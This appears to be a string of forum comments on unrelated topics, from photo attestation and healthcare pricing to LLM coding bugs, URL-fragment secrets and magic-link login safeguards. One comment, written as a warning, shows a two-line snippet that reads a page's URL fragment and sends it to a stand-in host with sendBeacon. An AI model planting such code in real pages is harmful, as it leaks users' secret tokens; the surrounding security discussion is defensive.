This camera's attestation and zero-knowledge proof cannot verify that a photo is not AI generated. Worse, those "verifications" may trick people into believing photos are trustworthy or authentic when they are not.
Similar to ad-clicks or product reviews, if this were to catch on, Roc cameras (and Roc camera farms) would be used to take photos of inauthentic photos.
Ultimately, the only useful authenticity test is human reputation.
If someone (or an organization) wants to be trusted as authentic, the best they can do is stake their identity on the authenticity of things they do and share, over and over.
Patients and providers should have the ability to shop and negotiate price directly with each other. No 3rd party will ever be in a better position to negotiate individualized care and prices for 350,000,000 people than we (or our families) can for ourselves.
Currently, patients cannot price compare anything, not even the exact same drug from two different pharmacies on the same street! To make it worse, most providers can't make enough sense of the provider-insurer prices to shop on behalf of their patients.
To improve prices in healthcare, all care must have a price visible to all, paid by patients. Insurers should be required by law to publicly publish their reimbursement rates and to promptly (within 48 hours) reimburse their insured patients for care at approved (in-network) providers.
This would end the current intractable insurer-provider price web, in which it is impossible for patients to self-advocate and impossible for providers to advocate on their behalf.
Insurers and providers should never negotiate price. Providers should only be concerned with providing good care, how to classify/code it, and the amount they need to charge for that care to be financially viable. Insurers should only be concerned with how much they will pay out for each classification/code, and which providers they authorize as in-network.
Last, since there is a long tail of medical care that doesn't fit nicely into a code box, each plan should have a mandatory minimum coverage of something like 50% of all unknown-care costs at in-network providers and pharmacies above $5,000 annually, with some annual cap.
As a society, if we want to further subsidize healthcare for those with lower economic means, and/or those who end up with catastrophic expenses, then that should be done separately, as two distinct standalone welfare programs.
I've found that as LLMs improve, some of their bugs become increasingly slippery - I think of it as the uncanny valley of code.
Put another way, when I cause bugs, they are often glaring (more typos, fewer logic mistakes). Plus, as the author it's often straightforward to debug since you already have a deep sense for how the code works - you lived through it.
So far, using LLMs has downgraded my productivity. The bugs LLMs introduce are often subtle logical errors in otherwise "working" code. These errors are especially hard to debug when you didn't write the code yourself — now you have to learn the code as if you wrote it anyway.
I also find it more stressful deploying LLM code. I know in my bones how carefully I write code, thanks to a decade of roughly "one non-critical bug per 10k lines" that lets me sleep at night. The quality of LLM code can be quite chaotic.
That said, I'm not holding my breath. I expect this to all flip someday, with an LLM becoming a better and more stable coder than I am, so I guess I will keep working with them to make sure I'm proficient when that day comes.
I have been using LLMs for coding a lot during the past year, and I've been writing down my observations by task. For a lot of tasks, the first entry is me thoroughly impressed by how e.g. Claude helped me, and the second entry, a few days later, is me thoroughly irritated by chasing down subtle and just _strange_ bugs it introduced along the way. As a rule, these are incredibly hard to find and tedious to debug, because they lurk in the weirdest places, and the root cause is usually some weird confabulation that a human brain would never concoct.
Saw a recent talk where someone described AI as making errors, but not errors that a human would naturally make; its answers are usually "plausible but wrong". i.e. the errors these AIs make are of a different nature than what a human would make. This is the danger: reviews are now harder, and I can't trust it as much as a person coding at present. The agent tools are a little better (Claude Code, Aider, etc.) in that they can at least take build and test output, but even then I've noticed they do things that are wrong yet "plausible and build fine".
I've noticed it in my day-to-day: reviewing an AI PR is different from reviewing a PR from a co-worker; the problems are of different kinds. Unfortunately the AI issues tend to be the subtle kind, the things that could sneak into production code if I'm not diligent. It means reviews are more important, and I can't rely on previous experience of a co-worker and the typical quality of their PRs; effectively, every new PR comes from a different worker.
I'm curious where that expectation of the flip comes from? Your experience (and mine, frankly) would seem to indicate the opposite, so from whence comes this certainty that one day it'll change entirely and become reliable instead?
I ask (and I'll keep asking) because it really seems like the prevailing narrative is that these tools have improved substantially in a short period of time, and that is seemingly enough justification to claim that they will continue to improve until perfection because...? waves hands vaguely
Nobody ever seems to have any good justification for how we're going to overcome the fundamental issues with this tech, just a belief that comes from SOMEWHERE that it'll happen anyway, and I'm very curious to drill down into that belief and see if it comes from somewhere concrete or it's just something that gets said enough that it "becomes true", regardless of reality.
Firefox should make it clear that Firefox (the browser) will not collect, transmit, or sell user data beyond what is technically required for interaction between the browser and other computers over networks.
Anything less and people stop using Firefox.
If other Mozilla services need broader terms, those should be separate.
To create private shareable links, store the private part in the hash of the URL. The hash is not transmitted in DNS queries or HTTP requests.
Ex. When links.com?token=<secret> is visited, that link will be transmitted and potentially saved (search parameters included) by intermediaries like Cloudflare.
Ex. When links.com#<secret> is visited, the hash portion will not leave the browser.
Note: It's often nice to work with data in the hash portion by encoding it as a URL-safe Base64 string (i.e. JS Object ↔ JSON String ↔ URL-safe Base64 String).
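For example, a minimal sketch of that round trip (the helper names and the links.example host are made up, and error handling is skipped):

    // Encode a JS object as URL-safe Base64 for the fragment.
    function encodeFragment(data: object): string {
      const bytes = new TextEncoder().encode(JSON.stringify(data));
      const b64 = btoa(String.fromCharCode(...bytes));
      return b64.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
    }

    function decodeFragment(fragment: string): unknown {
      const b64 = fragment.replace(/-/g, "+").replace(/_/g, "/");
      const bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));
      return JSON.parse(new TextDecoder().decode(bytes));
    }

    // Everything after "#" stays in the browser and never hits the wire.
    const url = `https://links.example/#${encodeFragment({ token: "<secret>" })}`;

    // On the receiving page, read it back locally.
    const data = decodeFragment(location.hash.slice(1));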
> Ex. When links.com?token=<secret> is visited, that link will be transmitted and potentially saved (search parameters included) by intermediaries like Cloudflare.
Note: When served over HTTPS, the parameter string (and path) is encrypted, so the intermediaries in question need to be able to decrypt your traffic to read that secret.
Everything else is right. Just wanted to provide some nuance.
Good to point out. This distinction is especially important to keep in mind when thinking about where and/or who terminates TLS/SSL for your service, and any relevant threat models the service might have for the portion of the HTTP request after termination.
Huge qualifier: Even otherwise benign Javascript running on that page can pass the fragment anywhere on the internet. Putting stuff in the fragment helps, but it's not perfect. And I don't just mean this in a theoretical sense -- I've actually seen private tokens leak from the fragment this way multiple times.
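To make it concrete, here's a two-line sketch of how any script on the page can exfiltrate the fragment ("analytics.example" is a made-up endpoint):

    // Any script on the page, first- or third-party, can read the fragment
    // and ship it off somewhere.
    const fragmentSecret = location.hash.slice(1);
    navigator.sendBeacon("https://analytics.example/collect", fragmentSecret);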
Which is yet another reason to disable Javascript by default: it can see everything on the page, and do anything with it, including sending everything to some random server somewhere.
I am not completely opposed to scripting web pages (it’s a useful capability), but the vast majority of web pages are just styled text and images: Javascript adds nothing but vulnerability.
It would be awesome if something like HTMX were baked into browsers, and if enabling Javascript were something a user would have to do manually when visiting a page — just like Flash and Java applets back in the day.
Is there a feature of DNS I'm unaware of, that queries more than just the domain part? https://example.com?token=<secret> should only lead to a DNS query with "example.com".
The problem in GP isn't DNS. DNS will happily supply the IP address for a CDN. The HTTP[S] request will thereafter be sent by the caller to the CDN (in the case of Cloudflare, Akamai, etc.) where it will be handled and potentially logged before the result is retrieved from the cache or the configured origin (i.e. backing server).
Correct, DNS queries only include the hostname portion of the URL.
Maybe my attempt to be thorough – by making note of DNS alongside HTTP since it's part of the browser ↔ network ↔ server request diagram – was too thorough.
Thanks, finally some thoughts about how to solve the issue. In particular, email based login/account reset is the main important use case I can think of.
Do bots that follow links in emails (for whatever reason) execute JS? Is there a risk they activate the thing with a JS induced POST?
To somewhat mitigate the link-loading bot issue, the link can land on a "confirm sign in" page with a button the user must click to trigger the POST request that completes authentication.
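Roughly, the landing page's client code could look like this sketch (the endpoint, element id, and the assumption that the token arrives in the fragment are all illustrative):

    // The token is only submitted after an explicit user click, so bots that
    // merely load the URL don't complete authentication.
    const token = location.hash.slice(1);

    document.getElementById("confirm-sign-in")?.addEventListener("click", async () => {
      const res = await fetch("/auth/complete", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ token }),
      });
      if (res.ok) location.assign("/"); // signed in; redirect wherever makes sense
    });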
Another way to mitigate this issue is to store a secret in the browser that initiated the link request (Ex. in local storage). However, this can easily break in situations like private mode, where a new tab/window is opened without access to the same local storage.
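Something like this sketch (the key name and endpoints are illustrative):

    // 1) When the user requests a magic link, remember a per-request secret locally.
    async function requestMagicLink(email: string): Promise<void> {
      const requestId = crypto.randomUUID();
      localStorage.setItem("login-request-id", requestId);
      await fetch("/auth/request-link", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ email, requestId }),
      });
    }

    // 2) When the link is opened, send the stored value along with the token;
    // the server only completes sign-in if it matches the original request.
    // This is exactly what breaks in private windows or on a different device.
    const storedRequestId = localStorage.getItem("login-request-id");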
An alternative to the in-browser secret is doing a browser fingerprint match. If the browser that opens the link doesn't match the fingerprint of the browser that requested the link, then fail authentication. This also has pitfalls.
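For what it's worth, a very rough sketch (the signals and hashing here are illustrative; real fingerprinting uses many more signals and is still unreliable):

    // Hash a few coarse browser signals into a comparable fingerprint.
    async function browserFingerprint(): Promise<string> {
      const signals = [
        navigator.userAgent,
        navigator.language,
        Intl.DateTimeFormat().resolvedOptions().timeZone,
        `${screen.width}x${screen.height}`,
      ].join("|");
      const digest = await crypto.subtle.digest("SHA-256", new TextEncoder().encode(signals));
      return Array.from(new Uint8Array(digest), b => b.toString(16).padStart(2, "0")).join("");
    }
    // Send this hash with the link request; compare it again when the link is opened.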
Unfortunately, if your threat model also requires blocking bots that click, you're likely stuck adding some semblance of a second factor (pin/password, biometric, hardware key, etc.).
In any case, when using link-only authentication, best to at least put sensitive user operations (payments, PII, etc.) behind a second factor at the time of operation.
Makes sense. No action until the user clicks something on the page. One extra step but better than having “helpful bots” wreak havoc.
> to store a secret in the browser […] is doing a browser fingerprint match
I get the idea but I really dislike this. Assuming the user will use the same device or browser is an anti-pattern that causes problems for people, especially when crossing the mobile-desktop boundary. Generally, any web functionality shouldn't be browser dependent. Especially hidden state like that.
The secret is still stored in the browser's history DB in this case, which may be unencrypted (I believe it is for Chrome on Windows, last I checked). The cookie DB, on the other hand, I think is always encrypted using the OS's TPM, so it's harder for malicious programs to crack.
Yes, adding max-use counts and expiration dates to links can mitigate some browser-history snooping (rough server-side sketch below). However, if your browser history is compromised you probably have an even bigger problem...
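Something like this (the in-memory store and field names are illustrative, not from any particular framework):

    interface MagicLinkToken {
      userId: string;
      expiresAt: number;   // epoch ms
      usesLeft: number;
    }

    const tokens = new Map<string, MagicLinkToken>();

    function redeem(token: string): MagicLinkToken | null {
      const record = tokens.get(token);
      if (!record) return null;
      if (Date.now() > record.expiresAt || record.usesLeft <= 0) {
        tokens.delete(token);   // expired or exhausted: a stale link from history is useless
        return null;
      }
      record.usesLeft -= 1;     // enforce single- or limited-use
      return record;
    }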
The syntax of your language is quite nice. I’d maybe change (for …) to (each …), (fun …) to (fn …), and (let …) to (def …) or (set …) depending on implementation details of variable assignment, but those are just aesthetic preferences :)
I love '{thing}' for string interpolation.
If you haven’t already, check out clojure, janet-lang, io-lang, and a library like lodash/fp for more syntax and naming inspiration.
Thanks, I think this language will probably keep me hacking for a while :). You're right about the keyword naming, I tried to be unique, maybe too much so for functions, simply because I love them being named "fun". Let in the current implementation definitely is confusing due to it being used for both defining and updating a variable and its contents - maybe I'll change it to let and set, or def and set, who knows. Thanks for the feedback :)